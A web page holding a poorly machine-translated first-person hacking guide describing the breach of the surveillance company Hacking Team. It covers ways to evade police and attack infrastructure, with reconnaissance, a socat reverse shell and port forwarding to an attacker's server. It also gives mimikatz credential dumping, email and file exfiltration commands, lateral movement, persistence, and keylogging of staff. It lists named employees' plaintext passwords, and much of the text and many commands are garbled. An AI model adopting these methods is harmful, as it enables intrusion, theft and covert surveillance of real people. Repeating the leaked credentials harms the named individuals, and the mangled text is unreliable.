polybius.fyi/ht_exploitation_en.html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Polybius Hacklab</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="open source, hacklab, linux, libertarian, free, open, gpl">
    <meta name="author" content="">
            
    <!-- Le styles -->
    <link href="css/bootstrap.css" rel="stylesheet">
    <style type="text/css">
      body {
        padding-top: 60px;
        padding-bottom: 40px;
      }
    </style>
    <link href="css/bootstrap-responsive.css" rel="stylesheet">

    <!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
    <!--[if lt IE 9]>
      <script src="js/html5shiv.js"></script>
    <![endif]-->

    <!-- Fav and touch icons -->
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="ico/apple-touch-icon-144-precomposed.png">
    <link rel="apple-touch-icon-precomposed" sizes="114x114" href="ico/apple-touch-icon-114-precomposed.png">
      <link rel="apple-touch-icon-precomposed" sizes="72x72" href="ico/apple-touch-icon-72-precomposed.png">
                    <link rel="apple-touch-icon-precomposed" href="ico/apple-touch-icon-57-precomposed.png">
                                   <link rel="shortcut icon" href="ico/favicon.png">
  </head>

  <body>

    <div class="navbar navbar-inverse navbar-fixed-top">
      <div class="navbar-inner">
        <div class="container">
          <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="brand" href="#">Polybius</a>
          <div class="nav-collapse collapse">
            <ul class="nav">
              <li><a href="index.html">Home</a></li>
              <li class="active"><a href="#">About</a></li>
              <!--li><a href="#about">About</a></li>
              <li><a href="#contact">Contact</a></li>
              <li class="dropdown">
                <a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown <b class="caret"></b></a>
                <ul class="dropdown-menu">
                  <li><a href="#">Action</a></li>
                  <li><a href="#">Another action</a></li>
                  <li><a href="#">Something else here</a></li>
                  <li class="divider"></li>
                  <li class="nav-header">Nav header</li>
                  <li><a href="#">Separated link</a></li>
                  <li><a href="#">One more separated link</a></li>
                </ul>
              </li-->
            </ul>
            <!--form class="navbar-form pull-right">
              <input class="span2" type="text" placeholder="Email">
              <input class="span2" type="password" placeholder="Password">
              <button type="submit" class="btn">Sign in</button>
            </form-->
          </div><!--/.nav-collapse -->
        </div>
      </div>
    </div>


    <div class="container">

      <!-- Example row of columns -->
      <div class="row">
        <div class="span11">
                <h1>{it} About 0.1[<a href="#1">1</a>]</h1>
                <p><pre>
                - [1 - Introduction] ------------------------------------------- ----------------

You'll notice the language change since the last edition [1]. Speaking world
English already has books, lectures, guides, and information about spare
hacking. In this world there are many better I hackers, but unfortunately
They squander their knowledge working for contractors "defense"
for intelligence agencies to protect the banks and corporations and
to defend the established order. The hacker culture was born in the US as a
counterculture, but that source has remained in mere aesthetics - the rest has
It has been assimilated. At least they can wear a shirt, dye her hair blue,
hackers use their nicknames, and feel rebels while working for the
system.

Before someone had to sneak into the offices to filter documents [2].
a gun to rob a bank was needed. Today you can do it from
bed with a laptop in hands [3] [4]. As the CNT said after the
Gamma hack Group: "we try to take another step forward with new
forms of struggle "[5]. The hack is a powerful tool, let us learn and
let's fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf 
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group


- [2 - Hacking Team] ------------------------------------------ ----------------

Hacking Team was a company that helped governments to hack and spy on
journalists, activists, political opponents, and other threats to their power
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]. And, very occasionally, criminals and
terrorists [12]. A Vincenzetti, CEO, liked to finish his post with
the fascist slogan "boia chi molla". It would be more successful "boia RCS sells chi".
They also claimed to have technology to solve the "problem" of Tor and
darknet [13]. But seeing that I still have my freedom, I have my doubts about
their effectiveness.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

Unfortunately, our world is upside down. Enriches you do bad things
and imprisons you do good things. Fortunately, thanks to the work
hard for people such as "Tor project" [1], you can keep you from getting into the
jail by a few simple guidelines:

1) Encrypt your hard drive [2]

   I guess when the police arrive to impound your computer,
   mean you've already made many mistakes, but better safe
   than cure.

2) Use a virtual machine and all traffic routed by Tor

   This accomplishes two things. First, that all connections are anonymized to
   through the Tor network. Second, keep personal life and anonymous life
   on different computers it helps you not to mix by accident.

   You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or something
   personalized [6]. Here [7] there is a detailed comparison.

3) (Optional) Do not connect directly to the Tor network
   
   Tor is not the panacea. You can correlate the hours that you are connected
   Tor with the hours that your nickname is active hacker. There have also been
   successful attacks against the network [8]. You can connect to the Tor network through
   wifi others. Wifislax [9] is a Linux distribution with many
   tools to get wifi. Another option is to connect to a VPN or
   bridge node [10] before Tor, but is less secure because it still is
   They may correlate with hacker activity internet activity
   your home (this example was used as evidence against Jeremy Hammond
   [eleven]).

   The reality is that even though Tor is not perfect, it works quite well.
   When I was young and reckless, did many things without any protection (me
   referring to hacking) other than Tor, police made it impossible
   investigate, and I've never had problems.


[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[eleven] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html


---- [3.1 - Infrastructure] ----------------------------------------- ----------

No hacking directly with output relays Tor. They are blacklisted,
They are very slow, and you can not receive reverse connections. Tor serves to
protect my anonymity while I connect to the infrastructure used for
hack, which consists of:

1) Domain Names

   Addresses used for command and control (C & C), and for tunnels
   DNS for insured egress.

2) Stable Servers

   It serves to C & C servers to receive reverse shells, to launch
   attacks and keep the loot.

3) Servers Hacked

   They serve as pivots to hide the IP of stable servers, and
   when I want a quick connection without pivot. For example scan ports,
   scan the whole internet, download a database with SQL injection,
   etc.

Obviously you have to pay anonymously, as bitcoin (if you use it with
watch out).


---- [3.2 - Allocation] ----------------------------------------- ---------------

Often in the news that have attributed an attack on a group of
governmental hackers (the "APTs"), because they always use the same
tools, leaving the same fingerprints, and even use the same
infrastructure (domains, mail etc). They neglect because they can hack
without legal consequences.

I did not want to make it easier for police work and relate what Hacking
Team with hacks and nicknames of my daily work as a hacker glove
black. So I used new servers and domains registered with new post
and paid with new bitcoin address. In addition, only I used tools
public and things that I wrote especially for this attack and changed my way
to do some things to keep my normal forensic trace.


- [4 - Gathering Information] ------------------------------------------ ---------

Although it can be tedious, this stage is very important, because the more
larger the attack surface, the easier it will be to find a fault in a
portion thereof.


---- [4.1 - Technical Information] ---------------------------------------- -------

Some tools and techniques are:

1) Google

   You can find many unexpected things with a couple of good searches
   picked. For example, the identity of DPR [1]. The bible of how to use
   google to hack is the book "Google Hacking for Penetration Testers".
   You can also find a brief summary in Spanish in [2].

2) Enumeration of subdomains

   Often the primary domain of a company is hosted by a third party, and
   you are getting the IP ranges of the company thanks to subdomains as
   mx.company.com, ns1.company.com etc. Also, sometimes there are things that should not be
   be exposed to "hidden" subdomains. Useful tools for
   discover domains and subdomains are fierce [3], theHarvester [4] and
   recon-ng [5].

3) reverse lookups and searches whois

   With a reverse search using the whois information of a domain or range
   IPs of a company, you can find others of their domains and ranges
   IPs. To my knowledge, there is no free way to do reverse lookups
   whois, apart from a "hack" with google:
   
   "Via della Moscova 13" site: www.findip-address.com
   "Via della Moscova 13" site: domaintools.com

4) Port scanning and fingerprinting

   Unlike other techniques, this speaks servers
   company. I include in this section because it is not an attack, it is only for
   gather information. The company IDS can generate an alert to
   scan ports, but you do not have to worry because all internet
   it is constantly being scanned.

   To scan, nmap [6] necessary, and can fingerprint most
   services discovered. For companies with very long ranges of IPs,
   ZMap [7] or masscan [8] are fast. WhatWeb [9] or BlindElephant [10]
   You can fingerprint websites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/


---- [4.2 - Social Information] ---------------------------------------- --------

For social engineering, it is very useful to collect information about
employees, their roles, contact information, operating system, browser,
plugins, software, etc. Some resources are:

1) Google

   Here too, it is the most useful tool.

2) theHarvester and recon-ng

   I have already mentioned in the previous section, but have much more
   functionality. You can find a lot of information quickly and
   automated. Worth reading all documentation.

3) LinkedIn

   You can find much information about the employees here. The
   Company recruiters are more likely to accept your requests.

4) Data.com

   Formerly known as jigsaw. You have the contact information of many
   employees.

5) Metadata file

   You can find lots of information about employees and their systems
   metadata files that the company has published. helpful Tools
   to find files on the website of the company and extract
   Metadata is metagoofil [1] and FOCA [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html


- [5 - Entering the Network] ---------------------------------------- ------------

There are several ways to make entry. Since the method I used for hacking
team is rare and much more work than is usually necessary,
I'll talk a bit about the two most common methods, I recommend trying
First.


---- [5.1 - Social Engineering] ---------------------------------------- ---------

social engineering, spear phishing specifically, is responsible for the
Most hacking today. For an introduction in Spanish, see [1].
For more information in English, see [2] (the third part, "Targeted
Attacks "). For social engineering amusing anecdotes generations
past, see [3]. I did not want to try spear phishing against Hacking Team,
because your business is to help governments to spear phish their opponents.
Therefore there is a much higher risk that recognize and Hacking Team
investigate this attempt.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf


---- [5.2 - Buy Access] ---------------------------------------- ------------

Thanks to painstaking Russians and their exploit kits, smugglers trafficking, and
bot herders, many companies already have compromised computers within
their networks. Almost all Fortune 500, with their huge networks have a
bots already inside. However, Hacking Team is a very small company, and
Most employees are experts in computer security, then there was
little chance that were already committed.


---- [5.3 - Technical Operations] ---------------------------------------- -------

After hacking Gamma Group, I described a process to search
vulnerabilities [1]. Hacking Team has a range of public IP:
inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet

Hacking Team had very little exposed to the internet. For example, different
Gamma Group, your site customer needs a certificate
client to connect. What he had was his main website (a blog Joomla
that Joomscan [2] reveals no serious failure), a server post a
pair of routers, two VPN devices, and a device for filtering spam.
Then I had three options: find a 0day in Joomla, find a 0day in
postfix, or find a 0day in one of the embedded systems. A 0day a
embedded system seemed the most attainable option, and after two weeks
reverse engineering work, I got a remote root exploit. Given the
vulnerabilities have not yet been patched, I will not give more details.
For more information on how to find these vulnerabilities, see
[3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A


- [6 - Be Prepared] ------------------------------------------ -------------

I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoor firmware, and compiled several tools
post-exploitation for embedded system. The backdoor serves to protect the
exploit. Use the exploit only once and then return by the backdoor ago
work harder to find and patch vulnerabilities.

The post-exploitation tools he had prepared were:

1) busybox

   For all common UNIX utilities that the system did not.

2) nmap

   To scan and fingerprint the internal network of Hacking Team.

3) Responder.py

   The most useful tool to attack Windows networks when you have access to
   the internal network but do not have a domain user.

4) Python

   To run Responder.py

5) tcpdump

   To snoop traffic.

6) dsniff

   Weak passwords to spy protocols such as ftp, and to make
   ARP spoofing. I wanted to use ettercap, written by the same ALOR and naga
   Hacking Team, but it was difficult to compile for the system.

7) socat

   For a comfortable shell with pty:
   my_server: socat file: `tty`, raw, echo = 0 tcp-listen: mi_puerto
   Hacked system: socat exec: 'bash -li' pty, stderr, setsid, SIGINT, heal \
tcp: my_server: I mi_puerto

   And for many other things, it is a Swiss Army knife of networking. See section
   Examples of documentation.

8) screen

   As socat pty is not strictly necessary, but I wanted to feel
   at home in networks Hacking Team.

9) a SOCKS proxy server

   To use with proxychains to access the internal network with any
   another program.

10) tgcd

   To forward ports, as SOCKS server through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/


The worst that could happen was that my backdoor or post-exploitation tools
dejasen unstable the system and make an employee to investigate. By
So I spent a week trying my exploit, backdoor, and tools
post-operation over networks of other vulnerable companies before entering
Network Hacking Team.


- [7 - Look and Listen] ----------------------------------------- ----------

Now within the internal network, I want to take a look and think before giving
the next step. I turn Responder.py in analysis mode (-A, to listen without
Poisoned answers), and make a slow scan with nmap.


- [8 - NoSQL databases] ---------------------------------------- ----------

NoSQL, or rather NoAutenticación has been a great gift to the community
hacker [1]. When I worry that they have finally patched all failures
Authentication Bypass in MySQL [2] [3] [4] [5] put new fashion base
Data unauthenticated by design. Nmap is a few on the net
Internal Hacking Team:

27017 / tcp open MongoDB MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072
...
| _ Version = 2.6.5

27017 / tcp open MongoDB MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| DATABASES
...
| _ Version = 2.6.5

Were the databases for RCS test instances. The audio recording
RCS is stored in MongoDB with GridFS. The audio folder on torrent [6]
It comes from this. Unwittingly they spied on themselves.

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/


- [9 - Cables Cruzados] ------------------------------------------ -------------

Although it was fun to listen to recordings and view images Hacking webcam
Team developing its malware was not very useful. Unsteady copies of
security vulnerability were opened. according to his
documentation [1], its iSCSI devices must be on a separate network,
but nmap find some in your 192.168.1.200/24 ​​subnet:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260 / tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology: ht-synology.name
| Address: 192.168.200.66:3260,0
| _ Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260 / tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology: synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
| _ Authentication: No authentication required

iSCSI requires a kernel module, and compile it would have been difficult for the
embedded system. I forwarded the port to mount from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s -c 192.168.200.72:3260 VPS_IP: 42838

VPS: iscsiadm discovery -m -p -t 127.0.0.1 SendTargets

Now you find the name iqn.2000-01.com.synology iSCSI but has problems
when mounting because he believes his address is 192.168.200.72 instead of
127.0.0.1

The way I solved was:
iptables -t nat -A OUTPUT -d -j 192.168.200.72 DNAT --to-destination 127.0.0.1

And now after:
-m node iscsiadm --targetname = iqn.2000-01.com.synology: 192.168.200.72 -p synology-backup.name --login

... The device file appears! We ride:
vmfs-fuse -o ro / dev / sdb1 / mnt / tmp

and we find backups of multiple virtual machines. The server
Exchange seems most interesting. It is too large to download,
but we can mount remote and look for interesting files:
$ Losetup / dev / loop0 Exchange.hackingteam.com-flat.vmdk
$ Fdisk -l / dev / loop0
/ Dev / loop0p1 2048 1258287103 629142528 7 HPFS / NTFS / exFAT

then the offset is 2048 * 512 = 1048576
1048576 $ losetup -o / dev / loop1 / dev / loop0
$ Mount -o ro / dev / loop1 / mnt / exchange /

now in / mnt / exchange / WindowsImageBackup / EXCHANGE / Backup 172311 10/14/2014
We find the hard drive of the virtual machine, and assemble:
vdfuse -r -t -f VHD f0f78089-D28a-11e2-a92c-005056996a44.vhd / mnt / vhd-disk /
mount -o loop / mnt / vhd-disk / Partition1 / mnt / part1

... And finally we unpacked the doll and we can see all
the old Exchange server files in / mnt / part1

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf


- [10 - Backup to Domain Administrator] ---------------------

What interests me most about the backup is to look if you have a
or hash password you can use to access the current server. Use pwdump,
cachedump, and lsadump [1] with the registry files. lsadump is the
password account besadmin service:

_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ...........

proxychains [2] use the SOCKS server and embedded system
smbclient [3] to check the password:
proxychains smbclient //192.168.100.51/c$ '-U' hackingteam.local / besadmin% bes32678 !!! '

!Works! Besadmin password is still valid, and is an administrator
local. I use my proxy and psexec_psh metasploit [4] for a session
of meterpreter. Then I migrate to a 64-bit process, "load kiwi" [5]
"Creds_wdigest", and I have many passwords, including the Administrator
domain:

HACKINGTEAM BESAdmin bes32678 !!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- sysadmin go!
M.romeo HACKINGTEAM ioLK / (90
L.guerra HACKINGTEAM 4luc@=.=
HACKINGTEAM D.Martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
A.scarafile HACKINGTEAM Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A! E $$ andra
HACKINGTEAM m.bettini Ettore & Bella0314
M.luppi HACKINGTEAM Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set! Dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f @ #
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571 & 2E
HACKINGTEAM e.rabe erab @ 4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz


- [11 - Downloading Post] ----------------------------------------- ------

Now that I have the password for the domain administrator, I have access to
mails, the heart of the company. Because with every step I take is a
risk of detection, I download mails before further exploring.
Powershell makes it easy [1]. Interestingly, I found a bug with handling
dates. After getting the mail, I took a couple of weeks in
get the source and other code, so I returned occasionally to
download new emails. The server was Italian, with the dates
day / month / year. Use:
-ContentFilter {(Received -ge '05 / 06/2015 ') -or (Sent -ge '05 / 06/2015')}

with the New-MailboxExportRequest to download new mail (in this
If all mail from June 5. The problem is that says
the date is invalid if the day is greater than 12 (I guess this is because
US that is the first month and month can not be greater than 12). Looks like
Microsoft engineers have only tested their software with their own
regional configuration.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/


- [12 - Downloading Files] ------------------------------------------ -------

Now I'm a domain administrator, I also began to download
shares using my proxy and -Tc smbclient option for
example:

proxychains smbclient //192.168.1.230/FAE DiskStation '\
    -U 'HACKINGTEAM / Administrator% uu8dd8ndd12!' -TC FAE_DiskStation.tar '*'

So I downloaded the Amministrazione, FAE DiskStation, and FileServer folders
the torrent.


- [13 - Introduction to Hacking Windows Domain] -----------------------

Before continue telling the story of the Culiao Non-Windows, it should say something
knowledge to attack Windows networks.


---- [13.1 - Lateral Movement] ---------------------------------------- -------

I will give a brief overview of the techniques to spread within a network
Windows. Techniques to run remotely require the password or
hash of a local administrator on the target. By far the most common way
to get such credentials is to use mimikatz [1], especially
logonpasswords and sekurlsa sekurlsa :: :: mSv, on computers where you already have
administrative access. Movement techniques "in situ" also Require
administrative privileges (I except for runes). The more tools
important privilege escalation are PowerUp [2], and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1


Remote movement:

1) psexec

   The basic and proven way of moving windows networks. You can use
   psexec [1], winexe [2], psexec_psh metasploit [3], invoke_psexec of
   powershell empire [4], or the Windows command "sc" [5]. For module
   metasploit, powershell empire, and pth-winexe [6], enough to know the hash
   without knowing the password. It is the most universal way (works on any
   computer with port 445 open), but also way less
   cautious. It appears in the 7045 event log type "Service
   Control Manager. "In my experience, they have never realized for a
   hack, but sometimes you notice later and helps researchers understand
   what has made the hacker.

2) WMI

   more cautious way. WMI service is enabled on all
   Windows computers, but except for servers, the firewall blocks it
   default. You can use wmiexec.py [7] pth-WMIS [6] (here's a
   wmiexec demonstration and pth-WMIS [8]), invoke_wmi empire powershell
   [9], or the Windows command wmic [5]. All but need only wmic
   hash.

3) PSRemoting [10]

   It is disabled by default, and not advise enable new
   protocols that are not needed. But if the sysadmin already enabled,
   is very convenient, especially if you use powershell for all (and yes,
   you should use powershell for almost everything will change [11] with powershell 5
   and Windows 10, but now powershell day makes it easy to do everything in RAM,
   dodge antivirus, and leave few traces).

4) Scheduled Tasks

   You can run remote programs at and schtasks [5]. It works on the
   psexec same situations, and also leaves traces known [12].

5) GPO

   If all these protocols are disabled or blocked by
   firewall, once you are the domain administrator, you can use GPO
   to give a logon script, install a msi, run a scheduled task
   [13], or as we shall see computer Mauro Romeo (sysadmin Hacking
   Team), enable WMI and open the firewall via GPO.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py


Movement "in situ"

1) Impersonalizando Tokens

   Once you have administrative access to a computer, you can use the
   tokens of other users to access resources in the domain. Two
   tools to do this are incognito [1] and commands token :: * of
   mimikatz [2].

2) MS14-068

   You can take advantage of a validation failure kerberos to generate a
   ticket domain administrator [3] [4] [5].

3) Pass the Hash

   If you have your hash but the user has not logged on you can use
   sekurlsa :: pth [2] for a ticket user.

4) Injection Process

   Any RAT can be injected to another process, for example the command
   pupy migrate in meterpreter and [6] or psinject [7] in powershell empire.
   You can inject the process with the token you want.

5) runes

   This is sometimes very useful because it does not require privileges
   administrator. The command is part of windows, but if you have no interface
   Graphics can use powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1


---- [13.2 - Persistence] ----------------------------------------- ------------

Having gained access, you want to keep. Indeed, the persistence
It's just a challenge for motherfuckers like they want Hacking Team
hack activists or other individuals. Companies to hack, it goes
persistence because companies never sleep. I always use "persistence"
Duqu style 2 run in RAM on a pair of servers with high
uptime percentages. In the unlikely event that all restarted at a time,
I have a ticket passwords and gold [1] to access booking. You can read
more information on persistence mechanisms for windows here
[2. 3. 4]. But to hack into companies, you do not need and increases the risk of
detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/


---- [13.3 - Internal Recognition] ---------------------------------------- ---

The best tool for understanding today Windows is Powerview networks [1].
Worth reading everything written by the author [2] above all [3], [4], [5] and
[6]. Powershell itself is also very powerful [7]. As there are still many
2003 and 2000 servers without powershell, you must also learn the old
school [8], with tools like netview.exe [9] or the command windows
"Net view". Other techniques that I like are:

1) Download a list of file names

   With a domain administrator account, you can download all
   file names on the network with powerview:

   Invoke-ShareFinderThreaded -ExcludedShares IPC $, PRINT $, ADMIN $ |
   select-string '^ (. *) \ t' | % {$ _ Matches -recurse dir [0] .Groups [1]. |
   select fullname | files.txt -append out-file}

   Later, you can read at your own pace and choose which ones you want to download.

2) Read post

   As we have seen, you can be downloaded emails with powershell, and have
   lots of useful information.

3) Read sharepoint

   It is another place where many companies have important information. It can
   download with powershell [10].

4) Active Directory [11]

   It has lots of useful information about users and computers. Without being
   domain administrator, and you can find lots of information
   powerview and other tools [12]. After getting manager
   domain should export all the information of AD with csvde or other
   tool.

5) Spying on employees

   One of my favorite pastimes is hunting the sysadmins. spying
   Christan Pozzi (sysadmin Hacking Team) got the server accesso
   Nagios gave me accessibility to sviluppo rete (network development in
   RCS source code). With a simple combination of Get-Keystrokes and
   Get-TimedScreenshot of PowerSploit [13], Do-Exfiltration of Nishang [14], and
   GPO, you can spy on any employee or even the entire domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang


- [14 - Hunting Sysadmins] ------------------------------------------ ----------

By reading the documentation of its infrastructure [1], I realized that even I
lacked access to something important - "Rete Sviluppo" an isolated network
keeps all the RCS source code. Sysadmins of a company always
They have access to everything. I searched computers Mauro Romeo and Christian
Pozzi to see how they handle the network sviluppo, and to see if there were other
interesting systems should investigate. It was easy to access your
computers since they were part of the Windows domain that had
administrator. Mauro computer Romeo had no open port,
so I opened the port of WMI [2] to execute meterpreter [3]. In addition to
record catches with keys and Get-Keystrokes and Get-TimedScreenshot, used many
modules / gather / metasploit, CredMan.ps1 [4], and searched files [5]. seeing
that Pozzi had a Truecrypt volume, I waited until he had assembled to
then copy the files. Many have laughed weak passwords
Christian Pozzi (Christian Pozzi and generally provides enough material
for comedy [6] [7] [8] [9]). I included them in filtration as an oversight and
to laugh at him. The reality is that mimikatz and keyloggers see all
same passwords.

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
